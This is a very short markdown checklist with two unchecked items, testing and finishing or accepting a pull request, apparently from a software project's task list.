- [ ] Test.
- [ ] Finish/Accept PR.
